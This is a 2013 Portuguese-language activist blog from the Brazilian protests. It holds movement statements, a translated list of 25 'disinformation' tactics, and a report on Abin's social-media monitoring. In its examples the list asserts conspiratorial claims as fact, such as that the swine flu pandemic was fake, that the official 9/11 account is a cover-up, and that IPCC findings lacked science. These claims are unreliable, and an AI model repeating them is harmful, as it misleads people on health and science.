sexta-feira, 5 de julho de 2013

Ativismo Nacional Transformando ideias em democracia.

Transformando ideias em democracia


Página:https://www.facebook.com/AtivismoNacional/
Grupo: https://www.facebook.com/groups/Ativismonacional/

‎#AtivismoNacional
O Ativismo Nacional é um movimento criado e pensado pelo povo. É um movimento de união. União de forças e objetivos para o bem maior de todos.





Tem o intuito de fundir as diversas reivindicações, aclamadas através das ruas e movimentos sociais, em uma luta nacional única, focada exclusivamente no crescimento do Brasil como um todo.

Acreditamos, incentivamos e apoiamos movimentos estaduais e municipais em paralelo ao movimento federal. Mas não podemos negar a extrema urgência de união nacional! Prezamos o uso direcionado e eficaz de nossas forças. Essa força a pouco redescoberta, e já recompensada com um alvoroço de vitorias. Delas podemos constatar que se exercermos nossos deveres com a pátria, nossos direitos serão automaticamente respeitados.

Aprendemos que a pátria somos nós e não fraquejaremos!




sexta-feira, 28 de junho de 2013

Ativismo Nacional - BR: Página voltada para unir todas forças de protestos Brasileiros.

Página voltada para unir todas forças de protestos Brasileiros. O movimento 'Ativismo Nacional' iniciou com a revolta pelo aumento no preço das passagens, que desencadeou os gritos contra todas as enfermidades do país a muito trancados na garganta de cada brasileiro, já cansado de todo mal que os afeta e martiriza de norte a sul. É sabido que a maioria dos problemas deste país se deve à incompetência e imoralidade da administração pública, conhecidos por seus escândalos e desvios de dinheiro público, NOSSO DINHEIRO!!   Em contra disso o povo está aguentando dignamente bala de borracha, gás, spray, difamação. Temos estudantes sitiados dentro das universidades, manifestantes sendo abordados e presos em suas casas, nos ônibus, e nas escolas, assim como manifestantes nas linhas de frente retendo a policia enquanto podem, e se necessário, não temem em fazer uso do próprio corpo!Para alguns, vândalos, para muitos, heróis sem rosto. Mas nada disso tirou do brasileiro essa nova ciência, de que ele unido é muito mais forte.   O grito do povo, seus cartazes e apelos, é a linha para a criação da pauta nacional, direcionada à uma reforma total do sistema POLÍTICO, EDUCACIONAL, SANITÁRIO, TRIBUTÁRIO, JUDICIÁRIO..... é, a lista é longa,mas a luta é justa! Queremos uma transformação geral, queremos um Brasil de todos, queremos um Brasil justo!!

Ativismo Nacional - BR: 


Página voltada para unir todas forças de protestos Brasileiros.
O movimento 'Ativismo Nacional' iniciou com a revolta pelo aumento no preço das passagens, que desencadeou os gritos contra todas as enfermidades do país a muito trancados na garganta de cada brasileiro, já cansado de todo mal que os afeta e martiriza de norte a sul. É sabido que a maioria dos problemas deste país se deve à incompetência e imoralidade da administração pública, conhecidos por seus escândalos e desvios de dinheiro público, NOSSO DINHEIRO!!

Em contra disso o povo está aguentando dignamente bala de borracha, gás, spray, difamação. Temos estudantes sitiados dentro das universidades, manifestantes sendo abordados e presos em suas casas, nos ônibus, e nas escolas, assim como manifestantes nas linhas de frente retendo a policia enquanto podem, e se necessário, não temem em fazer uso do próprio corpo!Para alguns, vândalos, para muitos, heróis sem rosto. Mas nada disso tirou do brasileiro essa nova ciência, de que ele unido é muito mais forte.

O grito do povo, seus cartazes e apelos, é a linha para a criação da pauta nacional, direcionada à uma reforma total do sistema POLÍTICO, EDUCACIONAL, SANITÁRIO, TRIBUTÁRIO, JUDICIÁRIO..... é, a lista é longa,mas a luta é justa! Queremos uma transformação geral, queremos um Brasil de todos, queremos um Brasil justo!!

Pagina:
https://www.facebook.com/AtivismoNacional
Grupo de discução:
http://www.facebook.com/groups/679785098714158/

quinta-feira, 27 de junho de 2013

As Regras da Desinformação: Vinte e Cinco Maneiras que as mídias e pessoas com "vida social" usam Suprimir a Verdade


As Regras da Desinformação: Vinte e Cinco Maneiras que as mídias e pessoas com "vida social" usam Suprimir a Verdade
As Regras da Desinformação: Vinte e Cinco Maneiras que as mídias e pessoas com "vida social" usam Suprimir a Verdade


Construído em cima das “Treze Técnicas para Suprimir a Verdade” de David Martin, a lista que se segue pode ser útil para o iniciado no mundo de verdades veladas e meias verdades, mentiras e supressão da verdade, que acontecem quando crimes graves são discutidos em fóruns públicos. Isto, infelizmente, inclui todos os meios de comunicação de hoje em dia, que são as maiores fontes de desinformação.
Sempre que o crime envolver uma conspiração, ou uma conspiração para encobrir um crime, haverá invariavelmente uma campanha de desinformação lançada contra aqueles que procuram descobrir e expor a verdade e/ou conspiração. Existem táticas específicas que artistas da desinformação tendem a aplicar, as quais apresentarei em seguida.
Os artistas da desinformação e aqueles que os controlam (aqueles que irão sofrer se o crime for resolvido) devem procurar evitar um exame completo e racional de qualquer cadeia de provas que fosse incriminá-los. Uma vez que fatos e verdades raramente caem por conta própria, eles devem ser superados com mentiras e enganos. Aqueles que são profissionais na arte da mentira e do engano, como a comunidade de inteligência, as autoridades governamentais e obviamente a mídia corporativa, tendem a aplicar neste processo ferramentas razoavelmente bem definidas e observadas. No entanto, o público em geral não é bem armado contra essas armas, e é muitas vezes facilmente enganado por essas táticas.
Surpreendentemente, nem os meios de comunicação nem as autoridades legais foram treinados para lidar com estas questões. Na maior parte do tempo, apenas os desinformantes compreendem as regras do jogo.
Espero que seja de grande valia para aqueles que estão começando a ver como as coisas realmente funcionam, bem como para aqueles que instintivamente já perceberam como estas táticas são utilizadas, conhecer exatamente cada uma das táticas e subterfúgios daqueles que pretendem esconder a verdade:

1. Não ouça o mal, não veja o mal, não fale do mal. Independentemente do que você sabe, não discuta, especialmente se você é uma figura pública, âncora de TV, etc. Se você não for informado é porque não aconteceu, e você nunca terá que lidar com os problemas.

2. Torne-se incrédulo e indignado. Evite discutir os principais problemas e ao invés foque em questões laterais que podem ser utilizadas para mostrar o tema como sendo crítico de algum grupo ou tema intocável. Este método é também é conhecido como o “Como você se atreve!“. Um bom exemplo é quando alguém questiona a versão oficial do 11 de setembro e a mídia diz isto é uma afronta às famílias das vítimas.

3. Crie boateiros. Evite discutir os problemas, descrevendo todas as acusações, independentemente das provas, como meros rumores e acusações selvagens. Outros termos depreciativos mutuamente exclusivos da verdade podem funcionar muito bem. Este método funciona especialmente bem com a silenciosa imprensa, porque a única maneira que o público poderá conhecer os fatos são através destes “boatos incertos”. Se você puder associar o material com a Internet, use isto para certificar a acusação como uma “fofoca” que não pode ter base na realidade. Isto foi muito usado pela rede globo durante a falsa pandemia da gripe suína.

4. Use um “espantalho”. Ache ou crie um elemento do argumento de seu oponente que você possa facilmente derrubar para você se sair bem e o seu adversário ficar em uma posição desfavorável. Ou então crie um problema que você possa implicar com segurança que exista com base na sua interpretação do adversário, nos argumentos do adversário ou da situação, ou então selecione o aspecto mais fraco das acusações mais fracas. Amplifique o seu significado e as destrua de uma forma que pareça desmentir todas as acusações, reais e as fabricada, enquanto na verdade evita a discussão das questões reais.

5. Desvie os adversários através de xingamentos e ridicularização. Isso também é conhecido como o estratagema do “ataque ao mensageiro” , embora outros métodos qualifiquem como variantes dessa abordagem. Associe adversários com títulos impopulares, como “malucos”, “de direita”, “liberal”, “esquerda”, “terroristas”, “teóricos da conspiração”, “radicais”, “milícias”, “racistas”, “religiosos fanáticos “, “drogados”, “desviados sexuais”, e assim por diante. Isso faz com que outros removam o seu apoio com medo de receber o mesmo rótulo, e assim você evita lidar com os problemas. Esta tática foi muito utilizada quando Charlie Sheen veio a público questionando a versão oficial do 11 de setembro.

6. Bata e Corra. Em qualquer fórum público, faça um breve ataque ao seu oponente ou a posição de adversário e em seguida pule fora antes de que uma resposta possa ser dada, ou simplesmente ignore qualquer resposta. Isso funciona muito bem em ambientes de internet e em cartas ao editor, onde um fluxo constante de novas identidades podem ser utilizadas sem ter que explicar o raciocínio crítico – simplesmente faça uma acusação ou outro ataque, nunca discutindo as questões, e nunca respondendo a qualquer resposta posterior, por que isto dignificaria o ponto de vista do oponente.

7. Questione os motivos. Distorça ou amplifique qualquer fato que possa insinuar que o adversário opera a partir de uma agenda oculta pessoal ou esteja sendo tendencioso de qualquer outra forma. Isso evita discutir as questões e força o acusador a ficar na defensiva.

8. Invoque autoridade. Reivindique para si mesmo autoridade ou se associe com autoridade e apresente seu argumento com o “jargão” ou “minúcias” o suficiente para ilustrar que você é “quem sabe”, e simplesmente diga que não é assim, sem discutir as questões ou demonstrar concretamente o porquê ou citar fontes.

9. Banque o idiota. Não importa o argumento de que a evidência ou lógica é oferecido, evite discutir questões negando que elas têm qualquer credibilidade, fazem qualquer sentido, fornecem qualquer prova, contém ou esclarecem uma questão, tem lógica, ou dão apoio a uma conclusão. Misture bem para ter o máximo efeito.

10. Associe as acusações do adversário com notícias antigas. Normalmente um derivado da estratégia do “espantalho”, em qualquer assunto de grande escala e alta visibilidade, alguém irá fazer acusações no início que podem ser ou já foram resolvidos facilmente. Se futuras acusações forem previsíveis, faça o seu lado levantar uma questão “espantalho” e a trate no início, como parte dos planos de contingência. As acusações subsequentes, independentemente da validade ou mesmo que cubram novas descobertas, elas geralmente podem ser associadas com a acusação inicial e refutadas como sendo uma simples repetição que pode ser refutada sem a necessidade de abordar as questões atuais – ainda melhor quando o adversário está ou esteve envolvido com a fonte original.

11. Estabeleça posições onde você possa retroceder. Usando uma questão ou elemento menos importante dos fatos, aja com classe “confesse” com franqueza que algum erro inocente, em retrospecto, foi feito, mas que os adversários aproveitaram a oportunidade para colocar tudo fora de proporção e implicam criminalidades maiores que, simplesmente “não é assim.” Outros podem reforçar isto em seu nome mais tarde. Feito corretamente, isso pode angariar a simpatia e o respeito de “jogar limpo” e “reconhecer” os seus erros, sem abordar as questões mais graves. Esta tática foi muito utilizada pelo IPCC quando veio a público que grande parte de suas estimativas de derretimento de geleiras, perda da floresta amazônica, entre outros, eram exageradas e não eram baseadas em estudos científicos.

12. Enigmas não têm solução. Inspirando-se na cadeia de eventos em torno do crime e da multiplicidade de participantes e eventos, pinte todo o assunto como muito complexo para ser resolvido. Isso faz com que aqueles que acompanhem o assunto comecem a perder o interesse mais rapidamente sem ter que resolver os problemas reais.

13. Lógica da “Alice no País das Maravilhas”. Evite o debate das questões raciocinando de trás para a frente com uma aparente lógica dedutiva de uma forma que deixe de fora qualquer fato material real.

14. Exija soluções completas. Evite as questões exigindo de seus opositores a resolução do crime atual completamente, um truque que funciona melhor para itens que qualifiquem-se para a regra 10 (Associe as acusações do adversário com notícias antigas).

15. Encaixe os fatos em conclusões alternativas. Isto requer um pensamento criativo, a menos que o crime tenha sido planejado com conclusões de contingência.

16. Desapareça com provas e testemunhas. Se elas não existirem, não existe fato, e você não terá de resolver o problema.

17. Mude de assunto. Normalmente utilizado em conexão com um dos outros estratagemas listados aqui, encontre uma maneira de desviar a discussão com os comentários abrasivos ou controversos, na esperança de chamar a atenção para um tema novo, mais fácil de lidar. Isto funciona especialmente bem quando os oponentes podem “discutir” com você sobre o tópico novo e polarize a arena de discussões, a fim de evitar discutir questões mais fundamentais.

18. Emotive, antagonize, e incite os oponentes. Se você não poder fazer mais nada, repreenda e insulte os seus adversários e os leve a respostas emocionais que possam fazê-los parecer tolos e emotivos, o que geralmente tornam o seu material um pouco menos coerente. Não só você vai evitar discutir os problemas em primeiro lugar, mas mesmo que a sua resposta emocional foque na questão em discussão, você pode ainda evitar as questões ao se concentrar em como eles “são sensíveis a críticas”.

19. Ignorar a prova apresentada, e exija provas impossíveis. Esta é talvez uma variante da regra do “banque o tolo”. Independentemente do material que possa ser apresentado por um adversário em fóruns públicos, alegue que a prova material seja irrelevante e exija uma que seja impossível para o adversário mostrar (ela pode existir, mas não pode estar à sua disposição, ou pode ser algo que seja sabido que possa ser facilmente destruída ou retida, tal como a arma de um crime). Para evitar completamente discutir questões desminta categoricamente e seja crítico da mídia ou livros como fontes válidas, negue que as testemunhas sejam aceitáveis, ou mesmo negue que as declarações feitas por autoridades governamentais ou outras têm qualquer significado ou relevância.

20. Falsas provas. Sempre que possível, introduza novos fatos ou pistas projetados e fabricados para entrar em conflito com as apresentações do adversário para neutralizar questões sensíveis ou dificultar a resolução. Isso funciona melhor quando o crime foi planejado com contingências para este propósito, e os fatos não podem ser facilmente separados das invenções.

21. Chame um Grande Júri, Promotoria Especial, ou outro organismo habilitado para investigações. Subverta o processo para seu próprio benefício e efetivamente neutralize todas as questões sensíveis, sem uma discussão aberta. Uma vez convocado, as evidências e testemunhos devem ser secretos. Por exemplo, se o advogado de acusação estiver do seu lado, ele pode garantir que o Grande Júri não ouça nenhuma evidência útil e que as provas sejam vedadas e indisponíveis para investigações posteriores. Depois de um veredicto favorável (geralmente, esta técnica é aplicada para inocentar o culpado, mas também pode ser utilizada para obter acusações quando se procura enquadrar uma vítima) for alcançado, o assunto pode ser considerado oficialmente encerrado.

22. Fabrique uma nova verdade. Crie o seu próprio perito(s), grupo(s), autor(es), líder(es) ou influencie os existentes para forjar novos caminhos através de pesquisa científica, investigativa ou social, ou testemunho que conclua favoravelmente. Desta forma, se você realmente precisar lidar com as questões relevantes, você pode fazê-lo com autoridade.

23. Crie distrações maiores. Se as estratégias acima não funcionarem para desviar questões sensíveis, ou para impedir a indesejável cobertura da mídia de eventos que não se possa impedir, tais como julgamentos, crie notícias mais importante (ou as trate como tal) para distrair as multidões.

24. Silencie os críticos. Se os métodos acima não funcionarem, considere remover os oponentes de circulação através de uma solução definitiva, para que a necessidade de abordar as questões seja totalmente removida. Isso pode ser através de sua morte, prisão e detenção, chantagem ou destruição do seu carácter pela liberação de informações de chantagem, ou simplesmente pela intimidação adequada usando chantagem ou outras ameaças.

25. Desapareça. Se você é um portador de segredos importantes relacionados a algum crime ou conspiração e você acha que o calor está ficando muito quente, para evitar os problemas, desapareça.
Todos os comentários são muito bem vindos, mas os leitores mais experientes desta page podem contribuir apresentando exemplos específicos de cada regra, fiquem a vontade.

sexta-feira, 21 de junho de 2013

Abin cria operação para monitorar Facebook, Twitter, Instagram e WhatsApp.


Abin cria operação para monitorar Facebook, Twitter, Instagram e WhatsApp.


Uma falha da Agência Brasileira de Inteligência, a Abin, deu origem a uma operação para monitoramento dos protestos marcados via rede social. A partir de hoje, a organização anunciou que estará monitorando o Twitter, Facebook, Instagram e WhatsApp para avaliar o alcance e comportamento das manifestações que estão tomando conta do Brasil.

De acordo com informações do Estadão, a iniciativa surgiu após o Gabinete de Segurança Institucional não ter alertado os assessores da presidente Dilma Rousseff sobre os protestos que resultaram, inclusive, na invasão do Congresso Nacional. Assim, foi criado um sistema de monitoramento chamado Mosaico, que filtra as postagens das redes a partir de 700 temas definidos pela Abin.

Assim, espera a agência, será possível prever a rota das passeatas, a infiltração de grupos políticos entre os protestos e até mesmo um possível financiamento deles. Hoje mesmo, por exemplo, descobriram-se planos de manifestações em frente ao Palácio do Planalto, onde já foram instaladas grades para proteger as instalações.

O governo não se pronunciou sobre acusações de invasão de privacidade que estão eclodindo aqui e ali na imprensa nacional, principalmente devido à inclusão do WhatsApp na lista de monitoramento. Enquanto redes como o Twiter ou Facebook têm boa parte de seu conteúdo aberto, o mesmo não pode ser dito do aplicativo de mensagens, cujos envios são compartilhados apenas entre os envolvidos na conversa.

quarta-feira, 19 de junho de 2013